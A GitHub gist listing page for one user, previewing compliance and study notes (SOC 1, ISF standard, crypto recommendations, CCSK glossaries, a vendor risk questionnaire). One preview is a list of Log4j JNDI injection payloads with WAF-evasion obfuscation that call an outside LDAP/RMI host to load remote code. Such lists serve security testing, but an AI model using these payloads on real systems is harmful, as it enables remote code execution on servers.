Skip to content

Instantly share code, notes, and snippets.

View opexxx's full-sized avatar

Alexander Knorr opexxx

View GitHub Profile
SOC 1 - SOC for Service Organizations: ICFR
============================================
Report on Controls at a Service Organization Relevant to User Entities’ Internal Control over Financial Reporting (ICFR)
These reports, prepared in accordance with AT-C section 320, Reporting on an Examination of Controls at a Service Organization Relevant to User Entities’ Internal Control Over Financial Reporting, are specifically intended to meet the needs of entities that use service organizations (user entities) and the CPAs that audit the user entities’ financial statements (user auditors), in evaluating the effect of the controls at the service organization on the user entities’ financial statements.
There are two types of reports for these engagements:
Type 2 - report on the fairness of the presentation of management’s description of the service organization’s system and the suitability of the design and operating effectiveness of the controls to achieve the related control objectives included in the descriptio
@opexxx
opexxx / Standard of Good Practice for Information Security 2020
Created January 25, 2022 08:37
Standard of Good Practice for Information Security 2020
Security Governance
SG1 Security Governance Approach
SG1.1 Security Governance Framework
SG1.2 Security Direction
SG2 Security Governance Components
SG2.1 Information Security Strategy
SG2.2 Risk Appetite
Information Risk Assessment
IR1 Information Risk Assessment Framework
IR1.1 Information Risk Assessment - Management Approach
@opexxx
opexxx / Recommendation of cryptographic algorithms
Last active February 1, 2022 15:07
Recommendation of cryptographic algorithms
Recommendation of cryptographic algorithms:
Classification USA(NIST) Europe(ECRYPT) Korea(KISA)
Symmetric key encryption algorithm:
-AES-128/192/256 3TDEA
-AES-128/192/256,Blowfish, KASUMI,3TDEA
-SEED, HIGHT, ARIA-128/192/256
Public key cryptography algorithm:
-RSA-2048
(ISC)2
Klassenraum Online Instructor-Led Training
Certified Authorisation Professional | CAP (3 Tage)
2950,-€ (exkl. MwSt)
2590,-€ (exkl. MwSt)
Certified Cloud Security Professional (CCSP) (6 Tage)
@opexxx
opexxx / Log4j Payloads
Created December 13, 2021 01:25 — forked from ZephrFish/Log4j Payloads
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://l4j.zsec.uk/sploit}
${jndi:rmi://l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://l4j.zsec.uk/sploit}
@opexxx
opexxx / Third Party Security Risk Assessment
Last active September 6, 2022 22:23
Third Party Security Risk Assessment
Third Party Security Risk Assessment
As part of the business relationship your organization has with XXX, XXX Security Risk needs to understand how your organization is protecting your organizations assets. The assessment contains questions about key security controls designed and operating effectively in your environment(s). The security controls assessment should be answered holistically for your organization as a whole. The assessment must be completed within thirty (30) days of receipt.
E-Mail-Adresse *
Organization Name *
Input the name of your organization.
XYZ
Respondent Name and Title *
Input the questionnaire respondent name and job title.
@opexxx
opexxx / CCSK_glossary2
Created November 30, 2021 00:51
CCSK_glossary2
Module 1
Internet of Things
Internet of Things is a blanket term for non-traditional computing devices used in the physical world that utilize Internet connectivity. It includes everything from Internet-enabled operational technology (used by utilities like power and water) to fitness trackers, connected light bulbs, medical devices, and beyond.
Cloud Computing
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.
Resource Pools
Resources pools are how we build clouds. They are a collection of physical resources that are pooled together so a consumer of the cloud can pull resources from the pool, use them while they need them, and put them back in the pool for someone else to use them over time.
Broad Network Access
All resources are availabl
@opexxx
opexxx / CCSK_glossary
Created November 30, 2021 00:49
CCSK glossary
Module 1
Cloud Computing
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.
Resource Pools
Resources pools are how we build clouds. They are a collection of physical resources that are pooled together so a consumer of the cloud can pull resources from the pool, use them while they need them, and put them back in the pool for someone else to use them over time.
@opexxx
opexxx / CCSK learning
Created November 29, 2021 23:29
CCSK learning
____ sits on top of _____ and adds an additional layer of integration with application development frameworks, middleware capabilities, and functions such as database, messaging, and queuing. PaaS, IaaS
_____ can be avenues for data leakage. Log files and metadata
_____ is the interconnection of disparate Directories Services. Federation
______ is focused on aligning with external requirements while _______ is focused on aligning with internal requirements. Compliance, governance
@opexxx
opexxx / CCSK_Module1
Created November 29, 2021 13:10
CCSK_Module1
Cloud Computing
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.
Resource Pools
Resources pools are how we build clouds. They are a collection of physical resources that are pooled together so a consumer of the cloud can pull resources from the pool, use them while they need them, and put them back in the pool for someone else to use them over time.
Broad Network Access